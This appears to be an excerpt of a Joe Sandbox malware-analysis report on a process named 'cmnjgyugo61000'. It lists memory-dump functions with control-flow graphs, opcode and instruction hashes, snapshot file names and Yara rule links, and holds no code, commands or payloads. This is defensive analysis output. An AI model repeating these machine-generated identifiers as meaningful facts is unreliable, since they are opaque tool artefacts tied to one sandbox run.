                                                                                                            control_flow_graph 1790 650040-650060 1791 650067-6500df 1790->1791 1792 650062 1790->1792 1796 6500e1-650127 1791->1796 1797 65012c-65017e 1791->1797 1792->1791 1804 6501c5-6502a9 1796->1804 1797->1804 1805 650180-6501c4 1797->1805 1817 6502af-6503b1 1804->1817 1818 650e5e-650e93 1804->1818 1805->1804 1828 650e51-650e57 1817->1828 1829 6503b6-650493 1828->1829 1830 650e5d 1828->1830 1838 650495 1829->1838 1839 65049a-650502 1829->1839 1830->1818 1838->1839 1843 650504 1839->1843 1844 650509-65051a 1839->1844 1843->1844 1845 6505a6-6506ac 1844->1845 1846 650520-65052a 1844->1846 1864 6506b3-65071b 1845->1864 1865 6506ae 1845->1865 1847 650531-6505a5 1846->1847 1848 65052c 1846->1848 1847->1845 1848->1847 1869 650722-650733 1864->1869 1870 65071d 1864->1870 1865->1864 1871 6507bf-650972 1869->1871 1872 650739-650743 1869->1872 1870->1869 1893 650974 1871->1893 1894 650979-6509f6 1871->1894 1873 650745 1872->1873 1874 65074a-6507be 1872->1874 1873->1874 1874->1871 1893->1894 1898 6509fd-650a0e 1894->1898 1899 6509f8 1894->1899 1900 650a14-650a1e 1898->1900 1901 650a9a-650b33 1898->1901 1899->1898 1902 650a25-650a99 1900->1902 1903 650a20 1900->1903 1911 650b35 1901->1911 1912 650b3a-650bb1 1901->1912 1902->1901 1903->1902 1911->1912 1919 650bb3 1912->1919 1920 650bb8-650bc9 1912->1920 1919->1920 1921 650cb6-650d4a 1920->1921 1922 650bcf-650c63 1920->1922 1931 650d50-650e3b 1921->1931 1932 650e3c-650e47 1921->1932 1937 650c65 1922->1937 1938 650c6a-650cb5 1922->1938 1931->1932 1933 650e4e 1932->1933 1934 650e49 1932->1934 1933->1828 1934->1933 1937->1938 1938->1921
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cddbf711bc4e4840f8aded34a54f1cfdf2cc2daa1585965c6b07cabc3fdc269b
                                                                                                            • Instruction ID: 325e27bc7b225a8aaf3b4cc2cb6f7bf8d4d7413099228c83eb0e9fed018391a0
                                                                                                            • Opcode Fuzzy Hash: cddbf711bc4e4840f8aded34a54f1cfdf2cc2daa1585965c6b07cabc3fdc269b
                                                                                                            • Instruction Fuzzy Hash: 5D826D74E012688FEB64DF65CD98BDDBBB2AF89300F1481EA950DA7255DB309E85CF40
                                                                                                            Function 003FE250 Relevance: .3, Instructions: 292COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908114705.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_3f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bc0c0ca2681ba25ae76c5adc1180cf36c55ad31d36ece2194f52511073ee7e8d
                                                                                                            • Instruction ID: 5a0fbea112d80f916bf30bba31ad11154e4da09e0382402253d1d4df54a281ea
                                                                                                            • Opcode Fuzzy Hash: bc0c0ca2681ba25ae76c5adc1180cf36c55ad31d36ece2194f52511073ee7e8d
                                                                                                            • Instruction Fuzzy Hash: E4D18174E002188FDB54DFA5C994BADBBB2FF89300F5481AAD409AB395DB356E81CF50
                                                                                                            Function 003F82B0 Relevance: .3, Instructions: 292COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 3146 3f82b0-3f82d0 3147 3f82d7-3f8368 3146->3147 3148 3f82d2 3146->3148 3152 3f836e-3f8384 3147->3152 3153 3f8728-3f875a 3147->3153 3148->3147 3204 3f8387 call 1d9330 3152->3204 3205 3f8387 call 1d9672 3152->3205 3156 3f838c-3f839e 3206 3f83a0 call 1ddd41 3156->3206 3207 3f83a0 call 1ddd50 3156->3207 3208 3f83a0 call 1de133 3156->3208 3157 3f83a5-3f83c0 3159 3f83c7-3f83d0 3157->3159 3160 3f83c2 3157->3160 3161 3f871b-3f8721 3159->3161 3160->3159 3162 3f8727 3161->3162 3163 3f83d5-3f8493 3161->3163 3162->3153 3170 3f854f-3f85a9 3163->3170 3171 3f8499-3f8507 3163->3171 3182 3f85aa-3f861d 3170->3182 3180 3f854a-3f854d 3171->3180 3181 3f8509-3f8549 3171->3181 3180->3182 3181->3180 3189 3f8706-3f8711 3182->3189 3190 3f8623-3f8705 3182->3190 3191 3f8718 3189->3191 3192 3f8713 3189->3192 3190->3189 3191->3161 3192->3191 3204->3156 3205->3156 3206->3157 3207->3157 3208->3157
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908114705.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_3f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3bf50f107893492af234d7f04cda9ff85f72689ad92c322734bd7fb89478e988
                                                                                                            • Instruction ID: 7f63d3042d00165fd22cd148e71fd5f4b7d3d7063b183f312d6b3fe1959ecaa6
                                                                                                            • Opcode Fuzzy Hash: 3bf50f107893492af234d7f04cda9ff85f72689ad92c322734bd7fb89478e988
                                                                                                            • Instruction Fuzzy Hash: DFD18274E002188FDB54DFA5C994BADBBB2FF89300F5481AAD409AB355DB355D81CF50
                                                                                                            Function 00652E78 Relevance: .2, Instructions: 220COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bed51828e14c6aced773b6f2f21a19e832c0b023f499b33821c467ba44c3f9e6
                                                                                                            • Instruction ID: 309e507fa91401982a7698deeb0f88dc96887eb6bac03046f81c23f8d778d97d
                                                                                                            • Opcode Fuzzy Hash: bed51828e14c6aced773b6f2f21a19e832c0b023f499b33821c467ba44c3f9e6
                                                                                                            • Instruction Fuzzy Hash: 7FA19475E012298FEB68CF6AC944BDDBBF2AF89301F14C1AAD408A7354D7345A85CF51
                                                                                                            Function 006549F8 Relevance: .2, Instructions: 220COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 915153d0df42b94efab6a5d53172428e173784611ff5652745538fd730efd6c6
                                                                                                            • Instruction ID: 533510b93106f30a63e08c3ebdf1fe57b1651cc9f1e53f4e700509fad0cf68a8
                                                                                                            • Opcode Fuzzy Hash: 915153d0df42b94efab6a5d53172428e173784611ff5652745538fd730efd6c6
                                                                                                            • Instruction Fuzzy Hash: 0FA1A570D012188FEB68CF6AC984BDDBBF2AF89305F14C1E9D409A7254DB305A85CF51
                                                                                                            Function 006550D8 Relevance: .2, Instructions: 220COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a7b7de6b78385bf2455250a2dd83d86eeddf2a24a57e2eb9ed5a2023477347e9
                                                                                                            • Instruction ID: 58360720b17335ad9fb48a0d738bcd6ec1966dc43c79a31d8d92219e8ce91bee
                                                                                                            • Opcode Fuzzy Hash: a7b7de6b78385bf2455250a2dd83d86eeddf2a24a57e2eb9ed5a2023477347e9
                                                                                                            • Instruction Fuzzy Hash: 68A19470D016288FEB68CF6AC954BDDBBF2AF89301F14C1AAD40DA7250DB705A85CF51
                                                                                                            Function 00653C38 Relevance: .2, Instructions: 220COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2a46347f32b02316cd9e305ccfbacffa4806ce37ba35b01e02611e7afb521c9d
                                                                                                            • Instruction ID: 2d4e1d6e3b4dc15d0a167dac4562eeb850bce68afee1410e9595de2b703af3c5
                                                                                                            • Opcode Fuzzy Hash: 2a46347f32b02316cd9e305ccfbacffa4806ce37ba35b01e02611e7afb521c9d
                                                                                                            • Instruction Fuzzy Hash: A4A19675E012298FEB68CF6AC944BDDFBF2AF89301F14C1AAD408A7250DB305A85CF51
                                                                                                            Function 00654318 Relevance: .2, Instructions: 220COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9ca40c1fa6589f8bd0d421afa90c323b3cc5f59a787246a0d754298bbe5e3f7b
                                                                                                            • Instruction ID: 6b656560661a3c09cb4f10f3489614cf8640ea3acc8101779920c855035e3f6f
                                                                                                            • Opcode Fuzzy Hash: 9ca40c1fa6589f8bd0d421afa90c323b3cc5f59a787246a0d754298bbe5e3f7b
                                                                                                            • Instruction Fuzzy Hash: 2FA19574E012198FEB68CF6AC944BDDBBF2AF89305F14C1EAD408A7254DB345A85CF51
                                                                                                            Function 00653558 Relevance: .2, Instructions: 219COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3fb8530147a7dd247e052c227d016602d4192f6bfdfe6cc2d7802f0c0591e1a9
                                                                                                            • Instruction ID: e21e406fb026b6c5397066d3f34384c3bd3888b684cd9b43737e4855473e7f3e
                                                                                                            • Opcode Fuzzy Hash: 3fb8530147a7dd247e052c227d016602d4192f6bfdfe6cc2d7802f0c0591e1a9
                                                                                                            • Instruction Fuzzy Hash: 8AA194B5E012298FEB68CF6AC944B9DFBF2AF89301F14C1A9D408A7350DB305A85CF55
                                                                                                            Function 006557B8 Relevance: .2, Instructions: 219COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 424990a3a43ea63d8fa5be8d4a5f13899e0f1c34414d965a7fa1387c169a779c
                                                                                                            • Instruction ID: 853927a969a8a44cb7d7ce83129278d791d8c142c83818ec02569f91211d6ed7
                                                                                                            • Opcode Fuzzy Hash: 424990a3a43ea63d8fa5be8d4a5f13899e0f1c34414d965a7fa1387c169a779c
                                                                                                            • Instruction Fuzzy Hash: 1DA1A370E01619CFEB68CF6AC994B9DBBF2AF89300F14C1AAD409A7250DB345A85CF51
                                                                                                            Function 0054A120 Relevance: .2, Instructions: 200COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908246663.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_540000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: effabcccc3fbe72d6c046c118532a3cd5eaff9c3de26360a13f49374b6e3faf3
                                                                                                            • Instruction ID: a76bb2440b2ece3365a1c46fb84fd231b404f7fa5b42022fc5de29b77b15cc89
                                                                                                            • Opcode Fuzzy Hash: effabcccc3fbe72d6c046c118532a3cd5eaff9c3de26360a13f49374b6e3faf3
                                                                                                            • Instruction Fuzzy Hash: 2481D274E00218CFDB58DFA6C894BADBBB2FF88304F208429D405AB398DB756942CF50
                                                                                                            Function 0065354A Relevance: .2, Instructions: 166COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ccc7a466d9a2df8f22c8d97dd8eb55967abc9b7669e3e29932f004a72ecdcfce
                                                                                                            • Instruction ID: 597323d2304bc084213c40e6edf8fb431c7a703547cacfd9a7e17fdf92086363
                                                                                                            • Opcode Fuzzy Hash: ccc7a466d9a2df8f22c8d97dd8eb55967abc9b7669e3e29932f004a72ecdcfce
                                                                                                            • Instruction Fuzzy Hash: F07195B1E016298FEB68CF66C954BDEBBF2AF88300F14C1E9D408A7254DB705A85CF50
                                                                                                            Function 006557A8 Relevance: .2, Instructions: 165COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 545bb8c2906cc39f8f30f669a730c66a601ea22917399f98a977575edeb95d65
                                                                                                            • Instruction ID: 7a8d5f7bc20edfb8e69e493ad59de52172c380eeb33b855cfdea3e7ec1497343
                                                                                                            • Opcode Fuzzy Hash: 545bb8c2906cc39f8f30f669a730c66a601ea22917399f98a977575edeb95d65
                                                                                                            • Instruction Fuzzy Hash: 7471A5B0E01619CFEB68CF66C954B9EFAF2AF88300F14C1E9D409A7254DB705A85CF50
                                                                                                            Function 00652E68 Relevance: .1, Instructions: 113COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b7ecb79e291b26810865046f7cba8bf19f2fafdd6ed030a60c500e7c579e78e6
                                                                                                            • Instruction ID: 06834986b35784f9e5920c20031e0334615e13c733ec9ec45f4aaea01bbee0e1
                                                                                                            • Opcode Fuzzy Hash: b7ecb79e291b26810865046f7cba8bf19f2fafdd6ed030a60c500e7c579e78e6
                                                                                                            • Instruction Fuzzy Hash: 48418471E016588FEB28CF6BD85479EFAF3AFC9300F14C1AAD408A6254EB740A858F11
                                                                                                            Function 00653C28 Relevance: .1, Instructions: 113COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6eb92467cbbded7b6bd2ee74c35d2be0b2ee17f0eff9dc731af77b3801614f7f
                                                                                                            • Instruction ID: 7765d6697afe788d39b96050c7dfe57bfe94e971bcd3bcd9e5b3b85af60a4f3c
                                                                                                            • Opcode Fuzzy Hash: 6eb92467cbbded7b6bd2ee74c35d2be0b2ee17f0eff9dc731af77b3801614f7f
                                                                                                            • Instruction Fuzzy Hash: 56417571E016189BEB68CF6BC8547DEBAF3AFC9200F14C1AAD40CA6254DB741A858F51
                                                                                                            Function 00654308 Relevance: .1, Instructions: 112COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: efc30595486027424ab85c9b28a2168d5fafe3cb9ecb44cd669437a8b25926f3
                                                                                                            • Instruction ID: 8e376e5a8f64ddffefa11b0685a29722423f37d9072bb8e66b84d6aefcc38f4c
                                                                                                            • Opcode Fuzzy Hash: efc30595486027424ab85c9b28a2168d5fafe3cb9ecb44cd669437a8b25926f3
                                                                                                            • Instruction Fuzzy Hash: 78418571E016588FEB68CF6BD9547DEFAF3AFC8204F14C1AAC40CA6264DB740A858F51
                                                                                                            Function 006550C8 Relevance: .1, Instructions: 111COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 46af3732c3feced84987c2365b9250356ea8ac1807121fbbff1ac3dce632cc1c
                                                                                                            • Instruction ID: 2d41341ace014b1a5f519b63935e1a99380c4b6d75abe7dc9c131194e5b9301b
                                                                                                            • Opcode Fuzzy Hash: 46af3732c3feced84987c2365b9250356ea8ac1807121fbbff1ac3dce632cc1c
                                                                                                            • Instruction Fuzzy Hash: 6B415771D016588BEB68CF6BD9547DEFAF3AFC9300F14C1AAC40CA6264EB741A858F51
                                                                                                            Function 006549E9 Relevance: .1, Instructions: 108COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4fe6cff76225fffc216f6f6953a600d1ca24de2ba331188e16b59985944c5a8d
                                                                                                            • Instruction ID: 9f6cddc094b351b12c2518b16df771c1397c0c11e27373d7128cd87fba30901f
                                                                                                            • Opcode Fuzzy Hash: 4fe6cff76225fffc216f6f6953a600d1ca24de2ba331188e16b59985944c5a8d
                                                                                                            • Instruction Fuzzy Hash: 84417671E016188FEB68CF6BD85479EFAF3AFC8300F14C1AAD40CA6254DB740A858F51
                                                                                                            Function 003FE23F Relevance: .1, Instructions: 99COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908114705.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_3f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6e9368df87be7bf8de6117705628e984b8901a8ef8283d2d18ce985e449edf6a
                                                                                                            • Instruction ID: 88ef8564fed45925a68b7009c034fc55ed46dff96f0db840b404f68d42868b7a
                                                                                                            • Opcode Fuzzy Hash: 6e9368df87be7bf8de6117705628e984b8901a8ef8283d2d18ce985e449edf6a
                                                                                                            • Instruction Fuzzy Hash: 9741D874E052188FDB18DFAAD8546AEBBF2BF89300F14D06AD518BB264DB345946CF50
                                                                                                            Function 003A9311 Relevance: .1, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908085019.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_3a0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 20f080772db740b731fa8e30e1510becc8ca659679c3a893acd139576c1277a5
                                                                                                            • Instruction ID: 26602c9c98cb7a60e4510c289469f6dc9a69725e1046a36d4c5b922713caaa0b
                                                                                                            • Opcode Fuzzy Hash: 20f080772db740b731fa8e30e1510becc8ca659679c3a893acd139576c1277a5
                                                                                                            • Instruction Fuzzy Hash: B131F574E012488FDB09DFAAD9456DEBBF2BF89300F24C12AD419BB254DB345942CF50
                                                                                                            Function 00562CEF Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1233 562cef-562cf7 1234 562c84-562c95 1233->1234 1235 562cf9-562d09 1233->1235 1239 562c97 1234->1239 1240 562c9e-562c9f 1234->1240 1243 562d0e-562d1b 1235->1243 1239->1240 1241 562c52-562c64 1239->1241 1240->1243 1244 562c66 1241->1244 1245 562c6d-562c6e 1241->1245 1259 562d23-562d27 1243->1259 1244->1240 1244->1241 1244->1245 1247 562b37-562b3d 1244->1247 1248 562bd5-562bd6 1244->1248 1249 562b52-562b6b 1244->1249 1250 562b70-562b83 1244->1250 1251 562bda-562beb 1244->1251 1252 562c1b-562c28 1244->1252 1253 562bd8 1244->1253 1254 562b44-562b4b 1244->1254 1255 562c01-562c19 1244->1255 1256 562c4c-562c4d 1244->1256 1257 562c2a-562c4a LdrInitializeThunk 1244->1257 1258 562bc8-562bd2 1244->1258 1245->1243 1247->1254 1248->1255 1262 562bf5-562bfb 1249->1262 1264 562b85 1250->1264 1265 562b8a-562bc6 1250->1265 1260 562bf2 1251->1260 1261 562bed 1251->1261 1252->1256 1263 562bd9 1253->1263 1254->1249 1255->1252 1255->1257 1256->1259 1257->1256 1258->1248 1267 562d2f-562d38 1259->1267 1268 562d29-562d2e 1259->1268 1260->1262 1261->1260 1262->1250 1262->1255 1263->1251 1264->1265 1265->1258 1265->1263 1268->1267
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908263475.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_560000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fe84665fdc714cb1b861c1a9aeaf78695e63c0b659aee1cea07461176a4edb66
                                                                                                            • Instruction ID: fc56e16fcef1f0668eb5864781538185cf571e51f9ebc6708407195312b0b056
                                                                                                            • Opcode Fuzzy Hash: fe84665fdc714cb1b861c1a9aeaf78695e63c0b659aee1cea07461176a4edb66
                                                                                                            • Instruction Fuzzy Hash: E85143B4D05608CFDB14CFA9D488ADDBBB1FF49311F20892AE019BB2A0D7749886CF15
                                                                                                            Function 00562AD8 Relevance: 1.6, APIs: 1, Instructions: 124libraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1273 562ad8-562afd 1274 562b04-562b6b 1273->1274 1275 562aff 1273->1275 1280 562bf5-562bfb 1274->1280 1275->1274 1281 562b70-562b83 1280->1281 1282 562c01-562c19 1280->1282 1283 562b85 1281->1283 1284 562b8a-562bc6 1281->1284 1285 562c2a-562c4a LdrInitializeThunk 1282->1285 1286 562c1b-562c28 1282->1286 1283->1284 1295 562bc8-562bd6 1284->1295 1296 562bd9-562beb 1284->1296 1287 562c4c-562d27 1285->1287 1286->1287 1290 562d2f-562d38 1287->1290 1291 562d29-562d2e 1287->1291 1291->1290 1295->1282 1299 562bf2 1296->1299 1300 562bed 1296->1300 1299->1280 1300->1299
                                                                                                            APIs
                                                                                                            • LdrInitializeThunk.NTDLL(000000FF), ref: 00562C3A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908263475.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_560000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 4f52c031d5cfe8ad4c5308ba144ae8f14b9de0ff8443e46b8b5b5521133938a6
                                                                                                            • Instruction ID: 125eef4c5bf1d7b014406a69ac78344a1ec4c1bc6dad85050de3ee2b062c714b
                                                                                                            • Opcode Fuzzy Hash: 4f52c031d5cfe8ad4c5308ba144ae8f14b9de0ff8443e46b8b5b5521133938a6
                                                                                                            • Instruction Fuzzy Hash: 125103B4D01618DFDB18CFAAD8886DDBBB2FF88310F20C52AE415AB2A4D7749945CF50
                                                                                                            Function 00562C73 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1301 562c73-562c7d 1302 562c7f-562c87 1301->1302 1303 562c89-562c8c 1301->1303 1304 562c8f-562c95 1302->1304 1303->1304 1305 562c97 1304->1305 1306 562c9e-562c9f 1304->1306 1305->1306 1307 562c52-562c64 1305->1307 1308 562d0e-562d1b 1306->1308 1309 562c66 1307->1309 1310 562c6d-562c6e 1307->1310 1324 562d23-562d27 1308->1324 1309->1306 1309->1307 1309->1310 1312 562b37-562b3d 1309->1312 1313 562bd5-562bd6 1309->1313 1314 562b52-562b6b 1309->1314 1315 562b70-562b83 1309->1315 1316 562bda-562beb 1309->1316 1317 562c1b-562c28 1309->1317 1318 562bd8 1309->1318 1319 562b44-562b4b 1309->1319 1320 562c01-562c19 1309->1320 1321 562c4c-562c4d 1309->1321 1322 562c2a-562c4a LdrInitializeThunk 1309->1322 1323 562bc8-562bd2 1309->1323 1310->1308 1312->1319 1313->1320 1327 562bf5-562bfb 1314->1327 1329 562b85 1315->1329 1330 562b8a-562bc6 1315->1330 1325 562bf2 1316->1325 1326 562bed 1316->1326 1317->1321 1328 562bd9 1318->1328 1319->1314 1320->1317 1320->1322 1321->1324 1322->1321 1323->1313 1332 562d2f-562d38 1324->1332 1333 562d29-562d2e 1324->1333 1325->1327 1326->1325 1327->1315 1327->1320 1328->1316 1329->1330 1330->1323 1330->1328 1333->1332
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908263475.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_560000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 36f0681bf97f5a808adc5eb8b35eb3135534e4ad98e682c20eff3377c3047065
                                                                                                            • Instruction ID: aa705c1c2b2312b37e8bb7ae243e55a013d06fa53d48827a438106ced8289cad
